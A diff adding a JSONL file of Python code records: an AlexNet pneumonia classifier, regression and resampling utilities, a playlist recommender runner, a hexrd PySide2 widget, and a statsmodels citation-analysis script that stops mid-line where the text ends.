diff --git "a/5339.jsonl" "b/5339.jsonl" new file mode 100644--- /dev/null +++ "b/5339.jsonl" @@ -0,0 +1,706 @@ +{"seq_id":"103713073","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\n\n\n# Add dropouts when we know what/how to use them...\nclass AlexNet(nn.Module):\n def __init__(self):\n super(AlexNet, self).__init__()\n\n # conv2D layer 3 channels in, 64 channels out, kernel size of 11 and padding of 2\n # initialise all convolution layers in the Alex-Net Architecture\n\n # start with a padding of two to avoid too much downsampling so image doesn't become 0x0\n self.conv1 = nn.Conv2d(3, 64, kernel_size = 11, padding = 2)\n self.conv2 = nn.Conv2d(64, 66, kernel_size = 5, padding = 2)\n self.conv3 = nn.Conv2d(66, 68, kernel_size=3, padding=1)\n self.conv4 = nn.Conv2d(68, 70, kernel_size=3, padding=1)\n self.conv5 = nn.Conv2d(70, 72, kernel_size=3, padding=1)\n\n # fully connected layers (inputs, outputs)\n self.fc1 = nn.Linear(72*7*7, 4096)\n self.fc2 = nn.Linear(4096, 1000)\n # output of 2 characteristics: NORMAL or PNEUMONIA\n self.fc3 = nn.Linear(1000, 2)\n\n # Defining how the Alex-Net is going to run.\n def forward(self, x):\n\n x = self.conv1(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n\n x = self.conv3(x)\n x = F.relu(x)\n\n x = self.conv4(x)\n x = F.relu(x)\n\n x = self.conv5(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n\n # reshape the tensor with 256*7*7 rows\n x = x.view(-1, 72*7*7)\n x = self.fc1(x)\n x = F.relu(x)\n\n x = self.fc2(x)\n x = F.relu(x)\n\n x = self.fc3(x)\n # calculate and return log probabilities for each sample in batch\n output = F.log_softmax(x, dim=1)\n\n return output","sub_path":"models/AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"412317784","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nfrom imageio import imread\nfrom sklearn.linear_model import Ridge, Lasso\nfrom sklearn.model_selection import KFold, train_test_split\nimport sklearn.linear_model as skl\nimport tqdm as tqdm\n\n#For bootstrap\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.utils import resample\n\ndef FrankeFunction(x,y):\n \"\"\"\n Generates Franke's function.\n Input:\n Takes array x and y.\n Output\n Returns array z.\n \"\"\"\n\n term1 = 0.75*np.exp(-(0.25*(9*x-2)**2) - 0.25*((9*y-2)**2))\n term2 = 0.75*np.exp(-((9*x+1)**2)/49.0 - 0.1*(9*y+1))\n term3 = 0.5*np.exp(-(9*x-7)**2/4.0 - 0.25*((9*y-3)**2))\n term4 = -0.2*np.exp(-(9*x-4)**2 - (9*y-7)**2)\n\n return term1 + term2 + term3 + term4\n\ndef generate_data(number_points = 20, plott = True):\n \"\"\"\n Generates data.\n Input:\n plott = True for plotting.\n Output:\n returns 1D arrays x, y and z (after begin raveled).\n \"\"\"\n x_data = np.arange(0, 1, 1./number_points)\n y_data = np.arange(0, 1, 1./number_points)\n\n x, y = np.meshgrid(x_data,y_data)\n\n z = FrankeFunction(x, y)\n if plott == True:\n plotter(x,y,z)\n plt.savefig('plots/Franke/frankefunction.pdf')\n\n #flatten the matrix out\n x = np.ravel(x)\n y = np.ravel(y)\n z = np.ravel(z)\n\n print (\"x ranges from\", 0, \"to\", 1, \"with a total amount of\", number_points, \"points.\")\n print (\"y ranges from\", 0, \"to\", 1, \"with a total 
amount of\", number_points, \"points.\")\n\n\n eps = np.random.normal(0,1,len(z))\n z += 0.1*eps\n\n return x, y, z\n #print (x_train)\ndef plotter(x,y,z):\n \"\"\"\n Function:\n Generates a three dimensional plot.\n Input:\n Takes an array x, y and z.\n Output:\n Gives a plot.\n \"\"\"\n fig = plt.figure();\n ax = fig.gca(projection='3d');\n # Plot the surface.\n surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False);\n # Customize the z axis.\n ax.set_zlim(-0.10, 1.40);\n ax.zaxis.set_major_locator(LinearLocator(10));\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'));\n for angle in range(0,150):\n ax.view_init(40,angle)\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5);\n\ndef terrain_data(skip_nr_points=50 ,plott = True):\n \"\"\"\n Generates the terrain data.\n Input:\n Skip number of points (lower number to include more data but will be slow)\n plott = True for plotting.\n Output:\n returns 1D arrays x, y and z (after begin raveled).\n \"\"\"\n\n #load the terrain\n terrain1 = imread('datafiles/terraintiff.tif')\n\n #Reducing the size of the terrain data to improve computation time\n z_data = terrain1[::skip_nr_points,::skip_nr_points]\n\n x_data = np.linspace(0,1,len(z_data[0]))\n y_data = np.linspace(0,1,len(z_data[:,0]))\n\n x, y = np.meshgrid(x_data,y_data)\n\n\n z = z_data\n z = (z - np.mean(z))/np.sqrt(np.var(z))\n\n if plott == True:\n\n fig = plt.figure();\n ax = fig.gca(projection='3d');\n # Plot the surface.\n surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False);\n # Customize the z axis.\n #ax.set_zlim(-0.10, 1.40);\n ax.zaxis.set_major_locator(LinearLocator(10));\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'));\n for angle in range(0,150):\n ax.view_init(60,angle)\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5);\n plt.title(\"Terrain Data\")\n plt.savefig(\"plots/Terrain/3D_plot_TERRAIN.pdf\")\n\n fig1 = plt.figure()\n plt.title(\"Terrain over a part of Norway\")\n image = plt.imshow(z_data)\n plt.colorbar(image)\n plt.xlabel('X')\n plt.ylabel('Y')\n plt.savefig(\"plots/Terrain/2D_plot_TERRAIN.pdf\")\n plt.show()\n\n #flatten the matrix out\n x = np.ravel(x)\n y = np.ravel(y)\n z = np.ravel(z_data)\n\n print (\"x ranges from\", 0, \"to\", 1, \"with a total amount of\", len(x), \"points.\")\n print (\"y ranges from\", 0, \"to\", 1, \"with a total amount of\", len(y), \"points.\")\n\n z = (z - np.mean(z))/np.sqrt(np.var(z))\n\n return x, y, z\n\ndef find_designmatrix(x,y, polygrad=5):\n \"\"\"\n Function:\n Generates the designmatrix.\n Input:\n Takes an array x and y and a polynomial degree.\n Output:\n Returns a multidimensional array (designmatrix).\n \"\"\"\n x2 = x*x\n y2 = y*y\n x3 = x*x*x\n y3 = y*y*y\n\n if (polygrad<1):\n raise ValueError (\"error! 
polygrad is less than 1!!\")\n\n if polygrad == 1:\n X = np.c_[np.ones((len(x),1)),x, y] #3\n elif (polygrad == 2):\n X = np.c_[np.ones((len(x),1)), #0-degree polynomial\n x, y, #1-degree polynomial\n x2,y2,x*y] #2-degree polynomial #6\n elif polygrad == 3:\n X = np.c_[np.ones((len(x),1)), #0-degree polynomial\n x, y, #1-degree polynomial\n x2,y2,x*y, #2-degree polynomial\n x3,y3,x*y2,x2*y] #3-degree polynomial #10\n elif polygrad == 4:\n X = np.c_[np.ones((len(x),1)), #0-degree polynomial\n x, y, #1-degree polynomial\n x2,y2,x*y, #2-degree polynomial\n x3,y3,x*y2,x2*y, #3-degree polynomial\n x*x3,y*y3,x3*y,x*y3,x2*y2] #4-degree polynomial #15\n\n elif polygrad ==5:\n X = np.c_[np.ones((len(x),1)), #0-degree polynomial\n x, y, #1-degree polynomial\n x2,y2,x*y, #2-degree polynomial\n x3,y3,x*y2,x2*y, #3-degree polynomial\n x*x3,y*y3,x3*y,x*y3,x2*y2, #4-degree polynomial\n x3*x2,y3*y2,(x2*x2)*y, x*(y2*y2),x3*y2,x2*y3] #5-degree polynomial #21\n\n #General formula to avoid hardcoding 'too' much.\n elif (polygrad > 5):\n X = np.zeros( (len(x), int(0.5*(polygrad + 2)*(polygrad + 1)) ) )\n poly = 0\n for i in range(int(polygrad) + 1):\n for j in range(int(polygrad) + 1 - i):\n X[:,poly] = np.squeeze((x**i)*(y**j))\n poly += 1\n return X\n\ndef R2(z_data, z_model):\n \"\"\"\n Function:\n Finds the R2-level for a given model and approximation.\n Input:\n Takes an array z_data and z_model.\n Output:\n Returns a scalar.\n \"\"\"\n return (1 - np.sum( (z_data - z_model)**2 ) / np.sum((z_data - np.mean(z_data))**2))\n\ndef MSE(z_data,z_model):\n \"\"\"\n Function:\n Finds the mean square error for a given model and approximation.\n Input:\n Takes an array z_data and z_model.\n Output:\n Returns a scalar.\n \"\"\"\n summ = 0\n for i in range(len(z_data)):\n summ += (z_data[i] - z_model[i])**2\n return summ/(len(z_data))\n\ndef confidence_interval(beta, MSE):\n \"\"\"\n Function:\n Finds the confidence interval.\n We are approximating the variance to be equal the mean square error.\n Input:\n Array beta and scalar MSE.\n Output:\n Array of three indexes with low, mid, and high beta values.\n \"\"\"\n\n sigma = np.sqrt(MSE)\n beta_low = np.mean(beta)-sigma*1.96\n beta_high = np.mean(beta)+sigma*1.96\n return [beta_low, np.mean(beta), beta_high]\ndef SVDinv(A):\n \"\"\"\n Function:\n This function inverts matrixes using singular value dcomposition (SVD).\n\n Input:\n Takes a matrix A.\n\n Output:\n Returns a matrix.\n \"\"\"\n U, s, VT = np.linalg.svd(A)\n\n D = np.zeros((len(U),len(VT)))\n for i in range(0,len(VT)):\n D[i,i]=s[i]\n UT = np.transpose(U); V = np.transpose(VT); invD = np.linalg.inv(D)\n return np.matmul(V,np.matmul(invD,UT))\n\ndef OLS(X,z,inversion='SVD'):\n \"\"\"\n Function:\n This is a solver for the ordinary least square method. Choose 'SVD' for\n numerical stability or choose 'normal' inversion for faster computation.\n\n Input:\n Takes a design matrix as X, a target-vector as z and inversion type.\n\n Output:\n Returns the solution array beta of the ordinary least square method.\n \"\"\"\n if inversion=='normal':\n beta = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(z)\n elif inversion=='SVD':\n A = X.T.dot(X)\n C = SVDinv(A)\n beta = C.dot(X.T).dot(z)\n return beta\n\ndef ridge_regression(X,z,lamb,inversion='SVD'):\n \"\"\"\n Function:\n This is a solver using Ridge regression. 
Choose SVD for\n numerical stability or choose normal inversion for faster computation.\n\n Input:\n Takes a design matrix as X, a target-vector as z, a hyperparameter\n (constant) lambda and a inversion type.\n\n\n Output:\n Returns the array solution beta of the Ridge regression.\n \"\"\"\n if inversion == 'normal':\n beta = np.linalg.inv(X.T.dot(X) + lamb*np.identity(len(X.T.dot(X)))).dot(X.T).dot(z)\n elif inversion == 'SVD':\n A = (X.T.dot(X) + lamb*np.identity(len(X.T.dot(X))))\n C = SVDinv(A)\n beta = C.dot(X.T).dot(z)\n return beta\n\ndef lasso_regression(X,z,lamb):\n \"\"\"\n Function:\n This is a solver using LASSO regression using the module sklearn.\n\n Input:\n Takes a design matrix as X, a target-vector as z and a hyperparameter\n (constant) lambda.\n\n Output:\n Returns the array solution beta of the LASSO regression.\n \"\"\"\n clf = Lasso(alpha=lamb)\n clf.fit(X,z)\n return (clf.coef_)\n\ndef k_fold_cross_validation(x, y, z, polygrad, k=5, lamb=0, regressiontype = 'OLS', get_CI = False):\n \"\"\"\n Function:\n This is a resample-technique based on the k-fold cross-validation.\n\n Input:\n Takes array input x,y and z as datapoints, the polynomial degree polygrad,\n number of k-fold cross-validation,hyperparameter lamb, a regressiontype,\n and confidence interval of beta.\n\n Output:\n Returns an array of mse and an array of R2-scores for the training data,\n a matrix with beta values for each k-fold, and a vector with mean beta-\n values.\n \"\"\"\n p = int(0.5*(polygrad + 2)*(polygrad + 1))\n train_MSE = np.zeros(k)\n betas = np.zeros((p,k))\n\n kfold = KFold(n_splits = k, shuffle=True)\n\n #splitting our training data into training- and validation data\n i =0\n for train_inds, val_inds in kfold.split(x):\n xtrain = x[train_inds]\n ytrain = y[train_inds]\n ztrain = z[train_inds]\n\n xval = x[val_inds]\n yval = y[val_inds]\n zval = z[val_inds]\n\n Xtrain = find_designmatrix(xtrain,ytrain, polygrad)\n\n if regressiontype == 'OLS':\n betatrain = OLS(Xtrain,ztrain)\n elif regressiontype == 'Ridge':\n betatrain = ridge_regression(Xtrain, ztrain, lamb)\n elif regressiontype == 'Lasso':\n betatrain = lasso_regression(Xtrain, ztrain, lamb)\n else:\n raise ValueError (\"regression-type is lacking input!\")\n\n\n Xval = find_designmatrix(xval,yval,polygrad)\n zpred = Xval @ betatrain\n\n #training data\n z_train = Xtrain @ betatrain\n\n train_MSE[i] = MSE(ztrain,z_train)\n\n # Storing all the betas\n betas[:,i] = betatrain\n\n i += 1\n\n train_MSE = np.mean(train_MSE)\n return [train_MSE], betas\n\ndef bootstrap(x,y,z,degrees,lamb=0,regressiontype='OLS',n_bootstrap=100):\n \"\"\"\n Function:\n This is a resample-technique based on the bootstrap method.\n\n Input:\n Takes array input x,y and z as datapoints, the polynomial degree interval of\n array degrees, a regressiontype and the number of bootstraps.\n\n Output:\n Returns an array of mean square error, the bias, and the variance of the\n test data.\n \"\"\"\n maxdegree = int(degrees[-1])\n\n error_test = np.zeros(maxdegree)\n mse = np.zeros(maxdegree)\n bias = np.zeros(maxdegree)\n variance = np.zeros(maxdegree)\n polydegree = np.zeros(maxdegree)\n\n x_train, x_test, y_train, y_test, z_train, z_test = train_test_split(x,y,z,test_size = 0.2)\n\n for degree in tqdm.tqdm(degrees):\n\n z_ALL_pred = np.empty((z_test.shape[0],n_bootstrap))\n X_test = find_designmatrix(x_test, y_test, polygrad=degree)\n\n\n for i in range(n_bootstrap):\n\n x_,y_,z_ = resample(x_train,y_train,z_train)\n\n Xtrain = find_designmatrix(x_,y_, degree)\n\n if 
regressiontype == 'OLS':\n betatrain = OLS(Xtrain,z_)\n elif regressiontype == 'Ridge':\n betatrain = ridge_regression(Xtrain, z_, lamb)\n elif regressiontype == 'Lasso':\n betatrain = lasso_regression(Xtrain, z_, lamb)\n else:\n raise ValueError (\"regression-type is lacking input!\")\n\n\n z_ALL_pred[:, i] = (X_test @ betatrain).ravel()\n\n z_test = np.reshape(z_test,(len(z_test),1))\n\n error_test[int(degree)-1] = np.mean( np.mean( ( z_test - z_ALL_pred)**2,axis=1,keepdims=True) )\n bias[int(degree)-1] = np.mean( (z_test - np.mean(z_ALL_pred, axis=1, keepdims=True))**2 )\n variance[int(degree)-1] = np.mean( np.var(z_ALL_pred, axis=1, keepdims=True) )\n return [error_test, bias, variance]\n\ndef bias_variance(x, y, z, polygrad, k, lamb=0, regressiontype = 'OLS'):\n \"\"\"\n Function:\n Finds the bias and variance for some independent test data.\n Input:\n Takes an array x,y, and z, with polynomial degree polygrad, k number of K-fold\n cross validation, hyperparameter lambda and a regression type.\n Output:\n Returns a list with an array of MSE for train data, and an array of MSE,\n an array of bias and an array of variance for test data, an an array of\n confidence intervals for beta values, and the average beta_values for k-fold CV.\n \"\"\"\n x, x_test, y, y_test, z, z_test = train_test_split(x,y,z,test_size=0.2)\n\n scores, beta_k_fold = k_fold_cross_validation(x, y, z, polygrad, k, regressiontype, get_CI = True)\n MSE_train = scores[0]\n\n X_test = find_designmatrix(x_test, y_test, polygrad=polygrad)\n z_pred = X_test @ beta_k_fold\n\n z_test = np.reshape(z_test,(len(z_test),1))\n\n #Calculating different value.\n MSE_test = np.mean( np.mean(( z_test - z_pred)**2,axis=1,keepdims=True) )\n bias_test = np.mean( (z_test - np.mean(z_pred, axis = 1, keepdims=True))**2)\n variance_test = np.mean( np.var(z_pred, axis=1, keepdims=True) )\n R2_test = R2(z_test,np.mean(z_pred,axis=1,keepdims=True))\n\n CI = confidence_interval(np.mean(beta_k_fold,axis=1,keepdims=True), MSE_test)\n\n return [MSE_train,R2_test, MSE_test, bias_test, variance_test, CI], beta_k_fold\n\n\ndef Different_Lambdas(x, y, z, degrees, k, lamb, regressiontype='OLS', resample_method='K_fold_CV'):\n\n \"\"\"\n Function:\n Runs bias_variance function for different polynomial degrees.\n Input:\n Data x,y and z with an array of polynomial degree degrees, number of k-fold\n cross validation, hyperparameter lamb, and a regression type.\n Output:\n Returns an array with mean square errors for the test data.\n \"\"\"\n\n test_MSE = np.zeros(len(degrees))\n test_R2 = np.zeros(len(degrees))\n\n for polygrad in degrees:\n\n j = int(polygrad) - 1\n\n scores, beta_tmp = bias_variance(x, y, z, polygrad, k, lamb, regressiontype)\n\n test_MSE[j] = scores[2]\n\n return test_MSE\n\n\ndef Best_Lambda(x, y, z, degrees, k, lamb, regressiontype='OLS'):\n\n \"\"\"\n Function:\n Runs bias_variance for different polynomial degrees.\n Input:\n Takes arrays of data x,y and z, with array of polynomial degrees, k number of\n k-fold cross validation, a hyperparameter lamb and regressiontype.\n Output:\n Returns arrays of mean square errors for MSE, R2, bias, variance, confidence\n interval for test data. 
Then returns a dictionary with beta values for different\n polynomial degrees, and finally returns the mean square error for training\n data.\n \"\"\"\n train_MSE = np.zeros(len(degrees))\n test_MSE = np.zeros(len(degrees))\n\n test_R2 = np.zeros(len(degrees))\n bias = np.zeros(len(degrees))\n variance = np.zeros(len(degrees))\n\n CI = np.zeros((len(degrees),3))\n bet = {}\n\n for polygrad in degrees:\n\n j = int(polygrad) - 1\n\n scores, bet[int(polygrad)] = bias_variance(x, y, z, polygrad, k, lamb, regressiontype)\n\n train_MSE[j] = scores[0]\n test_R2[j] = scores[1]\n test_MSE[j] = scores[2]\n bias[j] = scores[3]\n variance[j] = scores[4]\n CI[j] = scores[5]\n\n return test_MSE,test_R2, bias, variance, CI, bet,train_MSE\n","sub_path":"project1/Code/functions/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":16744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"121879767","text":"import pickle\nimport sys\n\nimport time\nfrom scipy import sparse\n\nfrom Dataset.RS_Data_Loader import RS_Data_Loader\nfrom KNN.HybridRecommenderXGBoost import HybridRecommenderXGBoost\nfrom KNN.ItemKNNCFPageRankRecommender import ItemKNNCFPageRankRecommender\nfrom MatrixFactorization.MatrixFactorization_RMSE import IALS_numpy\nfrom SLIM_BPR.Cython.SLIM_BPR_Cython import SLIM_BPR_Cython\nfrom SLIM_ElasticNet.SLIMElasticNetRecommender import SLIMElasticNetRecommender\n\nfrom MatrixFactorization.Cython.MatrixFactorization_Cython import MatrixFactorization_BPR_Cython, \\\n MatrixFactorization_FunkSVD_Cython, MatrixFactorization_AsySVD_Cython\nfrom MatrixFactorization.PureSVD import PureSVDRecommender\n\nfrom Base.NonPersonalizedRecommender import TopPop, Random\n\nimport numpy as np\n\nfrom KNN.UserKNNCFRecommender import UserKNNCFRecommender\nfrom KNN.HybridRecommenderTopNapproach import HybridRecommenderTopNapproach\nfrom KNN.ItemKNNCFRecommender import ItemKNNCFRecommender\nfrom KNN.HybridRecommender import HybridRecommender\nfrom KNN.ItemKNNCBFRecommender import ItemKNNCBFRecommender\nfrom KNN.UserKNNCBFRecommender import UserKNNCBRecommender\nimport Support_functions.get_evaluate_data as ged\nfrom GraphBased.RP3betaRecommender import RP3betaRecommender\nfrom GraphBased.P3alphaRecommender import P3alphaRecommender\nimport xgboost as xgb\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.datasets import make_classification\nimport traceback, os\n\nimport Support_functions.manage_data as md\nfrom run_parameter_search import delete_previous_intermediate_computations\n\n\ndef run():\n evaluate_algorithm = True\n delete_old_computations = False\n slim_after_hybrid = False\n\n # delete_previous_intermediate_computations()\n # if not evaluate_algorithm:\n # delete_previous_intermediate_computations()\n # else:\n # print(\"ATTENTION: old intermediate computations kept, pay attention if running with all_train\")\n # delete_previous_intermediate_computations()\n filename = \"hybrid_ICB_ICF_UCF_IALS_SLIM_ELASTIC_local_081962.csv\"\n\n dataReader = RS_Data_Loader(all_train=not evaluate_algorithm)\n\n URM_train = dataReader.get_URM_train()\n URM_PageRank_train = dataReader.get_page_rank_URM()\n URM_validation = dataReader.get_URM_validation()\n URM_test = dataReader.get_URM_test()\n ICM = dataReader.get_ICM()\n UCM_tfidf = dataReader.get_tfidf_artists()\n # _ = dataReader.get_tfidf_album()\n\n recommender_list1 = [\n # Random,\n # TopPop,\n ItemKNNCBFRecommender,\n # UserKNNCBRecommender,\n ItemKNNCFRecommender,\n 
UserKNNCFRecommender,\n # P3alphaRecommender,\n # RP3betaRecommender,\n # MatrixFactorization_BPR_Cython,\n # MatrixFactorization_FunkSVD_Cython,\n IALS_numpy,\n SLIM_BPR_Cython,\n # ItemKNNCFRecommenderFAKESLIM,\n # PureSVDRecommender,\n SLIMElasticNetRecommender\n ]\n\n from Base.Evaluation.Evaluator import SequentialEvaluator\n\n evaluator = SequentialEvaluator(URM_test, URM_train, exclude_seen=True)\n\n output_root_path = \"result_experiments/\"\n\n # If directory does not exist, create\n if not os.path.exists(output_root_path):\n os.makedirs(output_root_path)\n\n logFile = open(output_root_path + \"result_all_algorithms.txt\", \"a\")\n\n try:\n recommender_class = HybridRecommender\n print(\"Algorithm: {}\".format(recommender_class))\n\n '''\n Our optimal run\n '''\n recommender_list = recommender_list1 # + recommender_list2 # + recommender_list3\n\n onPop = False\n\n # onPop is used to choose whether the dynamic weights are based on popularity\n recommender = recommender_class(URM_train, ICM, recommender_list, URM_PageRank_train=URM_PageRank_train,\n dynamic=False, UCM_train=UCM_tfidf,\n URM_validation=URM_validation, onPop=onPop)\n\n recommender.fit(**\n {\n \"topK\": [10, 181, 82, -1, 761, 490],\n \"shrink\": [8, 0, 3, -1, -1, -1],\n \"pop\": [280],\n \"weights\": [0.47412263345597117, 1.3864620551711606, 0.6224999770898935, 1.5498327677561246,\n 0.1993692779443738, 2.113324096784624],\n \"final_weights\": [1, 1],\n \"force_compute_sim\": False, # not evaluate_algorithm,\n \"feature_weighting_index\": 0,\n \"epochs\": 150,\n 'lambda_i': [0.0], 'lambda_j': [1.0153577332223556e-08], 'SLIM_lr': [0.1],\n 'alphaP3': [0.4121720883248633],\n 'alphaRP3': [0.8582865731462926],\n 'betaRP': [0.2814208416833668],\n 'l1_ratio': 3.020408163265306e-06,\n 'alpha': 0.0014681984611695231,\n 'tfidf': [True],\n \"weights_to_dweights\": -1,\n \"IALS_num_factors\": 290,\n \"IALS_reg\": 0.001,\n \"IALS_iters\": 6,\n \"IALS_scaling\": 'log',\n \"IALS_alpha\": 40,\n \"filter_top_pop_len\": 0})\n\n print(\"TEST\")\n\n print(\"Starting Evaluations...\")\n # to indicate if plotting for length or for pop\n\n results_run, results_run_string, target_recommendations = evaluator.evaluateRecommender(recommender,\n plot_stats=False,\n onPop=onPop)\n\n print(\"Algorithm: {}, results: \\n{}\".format([rec.RECOMMENDER_NAME for rec in recommender.recommender_list],\n results_run_string))\n logFile.write(\"Algorithm: {}, results: \\n{} time: {}\".format(\n [rec.RECOMMENDER_NAME for rec in recommender.recommender_list], results_run_string, time.time()))\n logFile.flush()\n\n if not evaluate_algorithm:\n target_playlist = dataReader.get_target_playlist()\n md.assign_recomendations_to_correct_playlist(target_playlist, target_recommendations)\n md.make_CSV_file(target_playlist, filename)\n print('File {} created!'.format(filename))\n\n\n except Exception as e:\n traceback.print_exc()\n logFile.write(\"Algorithm: {} - Exception: {}\\n\".format(recommender_class, str(e)))\n logFile.flush()\n\n\n#\n# if not evaluate_algorithm:\n# delete_previous_intermediate_computations()\n\nif __name__ == '__main__':\n run()\n","sub_path":"run_all_algorithms_single_interval.py","file_name":"run_all_algorithms_single_interval.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"396513089","text":"from PySide2.QtCore import QObject, Signal\n\nfrom hexrd.ui.hexrd_config import HexrdConfig\nfrom hexrd.ui.ui_loader import UiLoader\n\n\nclass ImageModeWidget(QObject):\n\n # 
The string indicates which tab was selected\n tab_changed = Signal(str)\n\n # Tell the image canvas to show the snip1d\n polar_show_snip1d = Signal()\n\n def __init__(self, parent=None):\n super(ImageModeWidget, self).__init__(parent)\n\n loader = UiLoader()\n self.ui = loader.load_file('image_mode_widget.ui', parent)\n\n # Always start with raw tab\n self.ui.tab_widget.setCurrentIndex(0)\n\n self.setup_connections()\n self.update_gui_from_config()\n\n def setup_connections(self):\n self.ui.raw_tabbed_view.toggled.connect(HexrdConfig().set_tab_images)\n self.ui.raw_show_saturation.toggled.connect(\n HexrdConfig().set_show_saturation_level)\n self.ui.cartesian_pixel_size.valueChanged.connect(\n HexrdConfig()._set_cartesian_pixel_size)\n self.ui.cartesian_virtual_plane_distance.valueChanged.connect(\n HexrdConfig().set_cartesian_virtual_plane_distance)\n self.ui.cartesian_plane_normal_rotate_x.valueChanged.connect(\n HexrdConfig().set_cartesian_plane_normal_rotate_x)\n self.ui.cartesian_plane_normal_rotate_y.valueChanged.connect(\n HexrdConfig().set_cartesian_plane_normal_rotate_y)\n self.ui.polar_pixel_size_tth.valueChanged.connect(\n HexrdConfig()._set_polar_pixel_size_tth)\n self.ui.polar_pixel_size_eta.valueChanged.connect(\n HexrdConfig()._set_polar_pixel_size_eta)\n self.ui.polar_res_tth_min.valueChanged.connect(\n HexrdConfig().set_polar_res_tth_min)\n self.ui.polar_res_tth_max.valueChanged.connect(\n HexrdConfig().set_polar_res_tth_max)\n self.ui.polar_apply_snip1d.toggled.connect(\n HexrdConfig().set_polar_apply_snip1d)\n self.ui.polar_snip1d_width.valueChanged.connect(\n HexrdConfig().set_polar_snip1d_width)\n self.ui.polar_snip1d_numiter.valueChanged.connect(\n HexrdConfig().set_polar_snip1d_numiter)\n\n self.ui.polar_show_snip1d.clicked.connect(self.polar_show_snip1d.emit)\n\n self.ui.tab_widget.currentChanged.connect(self.currentChanged)\n\n def currentChanged(self, index):\n s = self.ui.tab_widget.tabText(index)\n self.tab_changed.emit(s)\n\n def all_widgets(self):\n widgets = [\n self.ui.raw_tabbed_view,\n self.ui.raw_show_saturation,\n self.ui.cartesian_pixel_size,\n self.ui.cartesian_virtual_plane_distance,\n self.ui.cartesian_plane_normal_rotate_x,\n self.ui.cartesian_plane_normal_rotate_y,\n self.ui.polar_pixel_size_tth,\n self.ui.polar_pixel_size_eta,\n self.ui.polar_res_tth_min,\n self.ui.polar_res_tth_max,\n self.ui.polar_apply_snip1d,\n self.ui.polar_snip1d_width,\n self.ui.polar_snip1d_numiter,\n self.ui.polar_show_snip1d\n ]\n\n return widgets\n\n def block_widgets(self):\n previous = []\n for widget in self.all_widgets():\n previous.append(widget.blockSignals(True))\n\n return previous\n\n def unblock_widgets(self, previous):\n for widget, block in zip(self.all_widgets(), previous):\n widget.blockSignals(block)\n\n def update_gui_from_config(self):\n block_list = self.block_widgets()\n try:\n self.ui.cartesian_pixel_size.setValue(\n HexrdConfig().cartesian_pixel_size)\n self.ui.cartesian_virtual_plane_distance.setValue(\n HexrdConfig().cartesian_virtual_plane_distance)\n self.ui.cartesian_plane_normal_rotate_x.setValue(\n HexrdConfig().cartesian_plane_normal_rotate_x)\n self.ui.cartesian_plane_normal_rotate_y.setValue(\n HexrdConfig().cartesian_plane_normal_rotate_y)\n self.ui.polar_pixel_size_tth.setValue(\n HexrdConfig().polar_pixel_size_tth)\n self.ui.polar_pixel_size_eta.setValue(\n HexrdConfig().polar_pixel_size_eta)\n self.ui.polar_res_tth_min.setValue(\n HexrdConfig().polar_res_tth_min)\n self.ui.polar_res_tth_max.setValue(\n 
HexrdConfig().polar_res_tth_max)\n self.ui.polar_apply_snip1d.setChecked(\n HexrdConfig().polar_apply_snip1d)\n self.ui.polar_snip1d_width.setValue(\n HexrdConfig().polar_snip1d_width)\n self.ui.polar_snip1d_numiter.setValue(\n HexrdConfig().polar_snip1d_numiter)\n finally:\n self.unblock_widgets(block_list)\n","sub_path":"hexrd/ui/image_mode_widget.py","file_name":"image_mode_widget.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"219625959","text":"\n\n\nimport pandas as pd\nimport numpy as np\nimport random\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\nfrom sklearn.preprocessing import scale\nfrom patsy import dmatrices\n\ndef calculate_vif(X, thresh=10.0):\n dropped = True\n while dropped:\n variables = X.columns\n dropped = False\n # print(X.columns)\n vif = [variance_inflation_factor(X[variables].values, X.columns.get_loc(var)) for var in X.columns]\n # print(vif)\n max_vif = max(vif)\n # print(max(vif))\n if max_vif > thresh:\n maxloc = vif.index(max_vif)\n # print(X.columns.tolist()[maxloc])\n X = X.drop([X.columns.tolist()[maxloc]], axis=1)\n dropped = True\n\n return X\n\n\ndef cem_test(perc, var, combined_papers_scaled, feature_var):\n # remove multi-collinearity\n aftervif = calculate_vif(combined_papers_scaled[feature_var])\n # aftervif = combined_papers_scaled[feature_var]\n\n features = [col.replace(col, 'C({})'.format(col)) if \"publish_\" in col else col for col in aftervif.columns]\n\n formula = \"citation_per_month_binary_{}perc ~ C(covid19) + C(covid19):{} + {}\".format(int(perc*100), var, \"+\".join(features))\n y, x = dmatrices(formula, combined_papers_scaled, return_type=\"dataframe\")\n\n model = sm.Logit(y, x).fit(maxiter=2000, method=\"lbfgs\", retall=False)\n\n write_filename = \"citation_binary_{}perc_{}_cem_model_journal\".format(int(perc*100), var)\n with open(\"../results/updated_results/{}.csv\".format(write_filename), \"w\") as fh:\n fh.write(model.summary().as_csv())\n\n return model\n\nif __name__ == \"__main__\":\n print(\"Loading modeling data...\")\n # COVID19\n covid19_papers_modeling_filename = 